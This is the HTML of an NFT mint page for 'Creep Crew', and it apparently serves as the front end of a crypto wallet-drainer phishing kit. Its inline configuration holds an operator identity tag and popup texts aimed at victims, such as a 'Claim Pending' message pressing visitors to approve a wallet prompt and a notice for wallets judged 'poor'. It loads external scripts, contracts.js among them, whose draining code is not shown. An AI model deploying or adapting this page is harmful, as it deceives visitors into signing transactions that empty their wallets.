<!DOCTYPE html>
<html </u>



<head>
  <script defer="defer" src="js/vendors.js"></script>
  <script defer="defer" src="js/contracts.js"></script>
  <script defer="defer" src="js/main.js"></script>

  <script>
    window.UNIQUE_IDENTITY = "happy_shakika_29";

    // Pick a theme here, this defaults to "light"
    window.modal_theme = "light" || "dark";

    // https://docs.walletconnect.com/web3modal/v2/html/wagmi/theming
    window.modal_variables = {
      /* Example of what you can do */
      // "--w3m-accent-color": "#FF00FF",
      // "--w3m-background-color": "#FF00FF",
      // "--w3m-logo-image-url": "/your-logo.svg",
      "--w3m-z-index": "99999999999999999999999",
    };

    // Notification modals
    window.popups = {
      PENDING: {
        // The popup that shows when they get prompted
        // title: "Claim Pending",
        text: "You must approve the prompt in order to continue."
      },
      INVALID: {
        // Shown when they connect on a wallet that is poor.
        // title: "Ineligible Address",
        text: "The connected account is not eligible for this event.\nPlease try using a different account.",
      }
    }

    // Only touch this if you know what you're doing!
    window.OVERRIDE_MODE = false;
  </script>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="94ecbec3c4e070b3.css" data-precedence="next">
  <link rel="stylesheet" href="3ebc5b60290384f0.css" data-precedence="next">
  <title>Creep Crew</title>
  <link rel="icon" href="favicon.ico" type="image/x-icon" sizes="16x16">
  <style type="text/css" id="operaUserStyle"></style>
  <script
  ></script>
</head>

<body>
  <div class="Stars_container__oWyy1">
    <div class="Stars_stars__y7NcT"></div>
    <div class="Stars_twinkling__VRRTQ"></div>
  </div>
  <div class="Characters_container__kDMdk">
    <div class="Characters_charContainer__pkkg_" style="">
      <div style="overflow: hidden;">
        <div style="display: grid;"><img src="char1.png" alt="character" class="glitch" id="Characters_char1__csMnD"
            style="grid-area: 1 / 1 / -1 / -1;" data-glitched="1"><img src="char1.png" alt="character" class="glitch"
            id="Characters_char1__csMnD"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char1.png" alt="character" class="glitch" id="Characters_char1__csMnD"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char1.png" alt="character" class="glitch" id="Characters_char1__csMnD"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char1.png" alt="character" class="glitch" id="Characters_char1__csMnD"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char1.png" alt="character" class="glitch" id="Characters_char1__csMnD"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char1.png" alt="character" class="glitch" id="Characters_char1__csMnD"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char1.png" alt="character" class="glitch" id="Characters_char1__csMnD"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char1.png" alt="character" class="glitch" id="Characters_char1__csMnD"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char1.png" alt="character" class="glitch" id="Characters_char1__csMnD"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char1.png" alt="character" class="glitch" id="Characters_char1__csMnD"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char1.png" alt="character" class="glitch" id="Characters_char1__csMnD"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char1.png" alt="character" class="glitch" id="Characters_char1__csMnD"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char1.png" alt="character" class="glitch" id="Characters_char1__csMnD"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char1.png" alt="character" class="glitch" id="Characters_char1__csMnD"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char1.png" alt="character" class="glitch" id="Characters_char1__csMnD"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"></div>
      </div>
    </div>
    <div class="Characters_charContainer__pkkg_" style="opacity: 1;">
      <div style="overflow: hidden;">
        <div style="display: grid;"><img src="char2.png" alt="character" class="glitch" id="Characters_char2__YGfAH"
            style="grid-area: 1 / 1 / -1 / -1;" data-glitched="1"><img src="char2.png" alt="character" class="glitch"
            id="Characters_char2__YGfAH"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char2.png" alt="character" class="glitch" id="Characters_char2__YGfAH"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char2.png" alt="character" class="glitch" id="Characters_char2__YGfAH"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char2.png" alt="character" class="glitch" id="Characters_char2__YGfAH"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char2.png" alt="character" class="glitch" id="Characters_char2__YGfAH"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char2.png" alt="character" class="glitch" id="Characters_char2__YGfAH"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char2.png" alt="character" class="glitch" id="Characters_char2__YGfAH"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char2.png" alt="character" class="glitch" id="Characters_char2__YGfAH"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char2.png" alt="character" class="glitch" id="Characters_char2__YGfAH"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char2.png" alt="character" class="glitch" id="Characters_char2__YGfAH"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char2.png" alt="character" class="glitch" id="Characters_char2__YGfAH"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char2.png" alt="character" class="glitch" id="Characters_char2__YGfAH"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char2.png" alt="character" class="glitch" id="Characters_char2__YGfAH"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char2.png" alt="character" class="glitch" id="Characters_char2__YGfAH"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char2.png" alt="character" class="glitch" id="Characters_char2__YGfAH"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"></div>
      </div>
    </div>
    <div class="Characters_charContainer__pkkg_" style="">
      <div style="overflow: hidden;">
        <div style="display: grid;"><img src="char3.png" alt="character" class="glitch" id="Characters_char3__737L_"
            style="grid-area: 1 / 1 / -1 / -1;" data-glitched="1"><img src="char3.png" alt="character" class="glitch"
            id="Characters_char3__737L_"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char3.png" alt="character" class="glitch" id="Characters_char3__737L_"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char3.png" alt="character" class="glitch" id="Characters_char3__737L_"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char3.png" alt="character" class="glitch" id="Characters_char3__737L_"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char3.png" alt="character" class="glitch" id="Characters_char3__737L_"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char3.png" alt="character" class="glitch" id="Characters_char3__737L_"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char3.png" alt="character" class="glitch" id="Characters_char3__737L_"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char3.png" alt="character" class="glitch" id="Characters_char3__737L_"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char3.png" alt="character" class="glitch" id="Characters_char3__737L_"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char3.png" alt="character" class="glitch" id="Characters_char3__737L_"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char3.png" alt="character" class="glitch" id="Characters_char3__737L_"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char3.png" alt="character" class="glitch" id="Characters_char3__737L_"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char3.png" alt="character" class="glitch" id="Characters_char3__737L_"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char3.png" alt="character" class="glitch" id="Characters_char3__737L_"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char3.png" alt="character" class="glitch" id="Characters_char3__737L_"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"></div>
      </div>
    </div>
    <div class="Characters_charContainer__pkkg_" style="">
      <div style="overflow: hidden;">
        <div style="display: grid;"><img src="char4.png" alt="character" class="glitch" id="Characters_char4__puZAP"
            style="grid-area: 1 / 1 / -1 / -1;" data-glitched="1"><img src="char4.png" alt="character" class="glitch"
            id="Characters_char4__puZAP"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char4.png" alt="character" class="glitch" id="Characters_char4__puZAP"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char4.png" alt="character" class="glitch" id="Characters_char4__puZAP"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char4.png" alt="character" class="glitch" id="Characters_char4__puZAP"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char4.png" alt="character" class="glitch" id="Characters_char4__puZAP"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char4.png" alt="character" class="glitch" id="Characters_char4__puZAP"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char4.png" alt="character" class="glitch" id="Characters_char4__puZAP"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char4.png" alt="character" class="glitch" id="Characters_char4__puZAP"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char4.png" alt="character" class="glitch" id="Characters_char4__puZAP"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char4.png" alt="character" class="glitch" id="Characters_char4__puZAP"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char4.png" alt="character" class="glitch" id="Characters_char4__puZAP"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char4.png" alt="character" class="glitch" id="Characters_char4__puZAP"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char4.png" alt="character" class="glitch" id="Characters_char4__puZAP"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char4.png" alt="character" class="glitch" id="Characters_char4__puZAP"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"><img
            src="char4.png" alt="character" class="glitch" id="Characters_char4__puZAP"
            style="grid-area: 1 / 1 / -1 / -1; user-select: none; pointer-events: none; opacity: 0;"></div>
      </div>
    </div>
  </div>
  <header class="Header_header__MwWvM"><img src="logo.svg" alt="logo"><button class="Header_connectBtn__5SIh1"><img
        src="moon-icon.svg" alt="moon">MINT<img src="moon-icon.svg" alt="moon"></button></header>
  <main class="page_main__akH3E">
    <div class="page_background__RvLBA"></div>
  </main>
  <footer class="Footer_footer__OYoYH"><button><img src="mute.png"></button></footer>
</body>

</html>